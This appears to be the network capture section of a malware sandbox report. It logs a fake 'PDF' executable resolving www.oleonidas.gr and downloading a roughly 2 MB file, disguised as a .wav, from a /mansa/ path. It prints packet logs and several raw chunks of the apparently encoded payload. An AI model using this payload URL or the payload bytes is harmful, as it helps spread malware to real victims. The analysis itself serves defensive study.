                                                                              Nov 18, 2024 16:23:12.139182091 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.223637104 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.223820925 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.223907948 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.223932981 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.223994017 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.224184990 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.224256992 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.224615097 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.224690914 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.225325108 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.225397110 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.225605965 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.225681067 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.225936890 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.226005077 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.239165068 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.239258051 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.264381886 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.264457941 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.264755011 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.264813900 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.342812061 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.342904091 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.343122959 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.343197107 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.343611002 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.343698025 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.344127893 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.344192028 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.344638109 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.344696999 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.345320940 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.345474005 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.345643044 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.345711946 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.383626938 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.383713961 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.384032011 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.384089947 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.465368986 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.465486050 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.466506004 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.466579914 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.468801022 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.468863964 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469000101 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469038963 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469057083 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469069004 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469094038 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469120026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469135046 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469182968 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469192028 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469196081 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469218969 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469234943 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469286919 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.469290972 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.469326973 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.503681898 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.503779888 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.503961086 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.504028082 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.504244089 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.504308939 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.585712910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.585978031 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.586092949 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586158991 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586164951 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.586172104 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586205006 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586215973 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.586225033 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586270094 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.586744070 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.586815119 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.587604046 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.587656975 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.587676048 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.587678909 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.587707043 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.587724924 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.596586943 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.596705914 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.623076916 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.623182058 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.623430967 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.623495102 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.703866005 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.704008102 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.704394102 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.704466105 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.704987049 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.705063105 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.705512047 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.705586910 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.705662966 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.705727100 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.706459999 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.706530094 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.706927061 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.706993103 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.708390951 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.708441019 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.708468914 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.708477020 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.708489895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.708522081 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.747164965 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.747334003 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.747493982 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.747555971 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.786612034 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.786782026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.827878952 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.828012943 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.828320980 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.828386068 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.828979015 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.829024076 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.829049110 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.829057932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.829075098 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.829098940 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.829876900 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.829948902 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.830785990 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.830854893 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.831643105 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.831708908 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.832171917 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.832247972 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.866605043 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.866755009 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.866791010 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.866842031 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.867070913 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.867141962 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.943121910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.943212986 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.946634054 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.946737051 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.947082043 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.947141886 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.947453976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.947516918 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.947788954 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.947848082 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.948070049 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.948131084 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.948455095 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.948504925 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.948718071 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.948776960 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.949326038 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.949383020 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.960179090 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.960254908 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.985763073 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.985847950 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:12.986217976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:12.986282110 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.100176096 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.100307941 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.100604057 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.100660086 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.100693941 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.100702047 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.100716114 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.100753069 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.101337910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.101408958 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.102022886 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.102092981 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.102097988 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.102154016 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.102937937 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103002071 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103007078 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103015900 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103111982 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103837967 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103893042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103907108 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103914976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103940010 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103960037 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.108658075 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.108731985 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.108974934 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.109040022 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.109405041 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.109472036 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.219527960 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.219674110 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.219960928 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220026970 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.220305920 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220357895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.220367908 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220421076 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.221000910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.221060991 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.221577883 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.221641064 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222245932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222284079 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222306013 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222313881 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222338915 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222357988 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.223238945 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223303080 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.223309994 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223330021 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223378897 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.224036932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.224107027 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.227871895 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.227952003 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.228254080 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.228311062 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.228317976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.228368044 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.338557005 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338826895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.338848114 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338865042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338913918 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.339008093 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.339068890 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.339600086 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.339667082 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340131998 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340193987 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340538025 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340593100 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340904951 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340960026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341629028 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341686964 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341694117 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341711044 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341737032 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341751099 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341758013 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341792107 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.342551947 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.342613935 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347084999 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347156048 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347357988 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347415924 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347580910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347630024 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347634077 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347664118 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347707987 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.352832079 CET49704443192.168.2.5185.78.221.73

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 18, 2024 16:23:06.456506014 CET5638053192.168.2.51.1.1.1
                                                                              Nov 18, 2024 16:23:06.601373911 CET53563801.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Nov 18, 2024 16:23:06.456506014 CET192.168.2.51.1.1.10x1cbcStandard query (0)www.oleonidas.grA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Nov 18, 2024 16:23:06.601373911 CET1.1.1.1192.168.2.50x1cbcNo error (0)www.oleonidas.groleonidas.grCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 18, 2024 16:23:06.601373911 CET1.1.1.1192.168.2.50x1cbcNo error (0)oleonidas.gr185.78.221.73A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.oleonidas.gr

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704185.78.221.734437092C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-18 15:23:07 UTC81OUTGET /mansa/Vurfw.wav HTTP/1.1
                                                                              Host: www.oleonidas.gr
                                                                              Connection: Keep-Alive
                                                                              2024-11-18 15:23:07 UTC301INHTTP/1.1 200 OK
                                                                              Date: Mon, 18 Nov 2024 15:23:07 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Mon, 18 Nov 2024 10:18:14 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 2124288
                                                                              Cache-Control: max-age=1209600
                                                                              Expires: Mon, 02 Dec 2024 15:23:07 GMT
                                                                              Vary: User-Agent
                                                                              Connection: close
                                                                              Content-Type: audio/x-wav
                                                                              2024-11-18 15:23:07 UTC7891INData Raw: 7f 62 a0 32 3b 30 32 38 34 32 38 30 cd c7 30 32 80 30 32 38 30 32 38 30 72 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 32 38 30 b2 38 30 32 36 2f 88 36 30 86 31 fd 13 80 31 7e f5 11 66 50 59 41 18 40 40 57 57 40 59 5d 12 5b 51 5c 56 5f 46 18 52 57 18 42 47 56 10 5b 56 10 76 77 63 12 55 5f 56 5d 1e 3f 35 3a 16 38 30 32 38 30 32 38 60 77 38 30 7e 39 33 32 ca 21 3a 8b 30 32 38 30 32 38 30 32 d8 30 3c 19 3b 33 08 30 32 5a 10 32 38 36 32 38 30 32 38 30 8c b8 10 32 38 10 32 38 30 92 18 30 32 38 70 32 38 10 32 38 30 30 38 30 36 38 30 32 38 30 32 38 34 32 38 30 32 38 30 32 38 d0 12 38 30 30 38 30 32 38 30 32 3b 30 72 bd 30 32 28 30 32 28 30 32 38 30 22 38 30 22 38 30 32 38 30 32 37 30 32 38 30 32 38 30 32 38 30
                                                                              Data Ascii: b2;0284280020280280r802802802802802802802802802802802808026/6011~fPYA@@WW@Y][Q\V_FRWBGV[VvwcU_V]?5:8028028`w80~932!:028028020<;302Z28628028028280028p2828008068028028428028028800802802;0r02(02(0280"80"80280270280280280
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 12 22 32 38 24 18 38 30 32 2b 00 31 38 34 32 38 30 32 38 30 32 38 30 32 12 23 02 3b 30 36 38 30 32 38 30 32 38 30 32 38 1a 21 08 33 32 b8 30 32 38 31 32 38 21 1a 9a 32 32 3e 10 30 38 30 32 c6 3e 32 38 08 32 38 30 32 c6 3c 32 38 75 31 38 30 32 3d 30 32 38 1f 32 38 30 34 38 30 32 00 30 32 38 30 18 46 9b 30 38 34 1a 6c 37 32 3e 10 32 38 30 32 46 1c 30 38 34 49 76 32 32 3c 09 f9 c7 cf cd 1e 10 33 38 30 32 00 f0 cd c7 cf 4c 94 32 32 3c 18 6a 3f 30 34 18 30 32 38 30 4c 14 32 32 3c 4b 46 3a 30 36 01 92 cd c7 cf 14 18 30 32 38 30 0a af cf cd c7 22 32 38 27 18 38 30 32 2a 30 32 2c 1a 32 38 30 20 38 30 25 12 30 32 38 23 02 3b 30 36 38 30 32 38 30 32 38 30 32 38 1a 20 38 30 26 12 30 32 38 23 02 3b 30 36 38 30 32 38 30 32 38 30 32 38 1a 20 38 30 25 12 30 32 38 23 02
                                                                              Data Ascii: "28$802+1842802802802#;068028028028!32028128!22>0802>282802<28u1802=02828048020280F084l72>2802F084Iv22<3802L22<j?040280L22<KF:060280"28'802*02,280 80%028#;068028028028 80&028#;068028028028 80%028#
                                                                              2024-11-18 15:23:08 UTC8000INData Raw: 32 3e 10 30 38 30 32 46 1c 30 38 34 49 b9 32 32 3c 0a 90 c7 cf cd 1e 10 33 38 30 32 00 a7 cd c7 cf 20 38 30 25 12 30 32 38 22 32 38 24 18 38 30 32 3b 00 3a 38 34 32 38 30 32 38 30 32 38 30 32 12 71 2e 38 30 32 38 30 32 68 30 32 38 90 33 38 30 c2 39 30 32 01 30 32 38 27 32 38 31 21 08 33 32 3c 30 32 38 30 32 38 30 32 38 30 18 2b 00 31 38 b0 32 38 30 33 38 30 23 10 92 30 38 36 12 39 30 32 38 ce 3c 38 30 0a 38 30 32 38 ce 3e 38 30 77 3b 30 32 38 1e 32 38 30 37 38 30 32 6f 30 32 38 08 1b 38 30 32 46 9b 30 38 34 1a 6c 37 32 3e 10 32 38 30 32 46 1c 30 38 34 49 79 32 32 3c 0a fe c7 cf cd 1e 10 32 38 30 32 00 f1 cd c7 cf 4c 94 32 32 3c 18 6a 3f 30 34 18 31 32 38 30 4c 14 32 32 3c 4b 4f 3a 30 36 02 93 cd c7 cf 14 18 32 32 38 30 0a a0 cf cd c7 1a 20 38 30 25 12 30
                                                                              Data Ascii: 2>0802F084I22<3802 80%028"28$802;:842802802802q.802802h028380902028'281!32<0280280280+18280380#0869028<808028>80w;0282807802o028802F084l72>2802F084Iy22<2802L22<j?041280L22<KO:062280 80%0
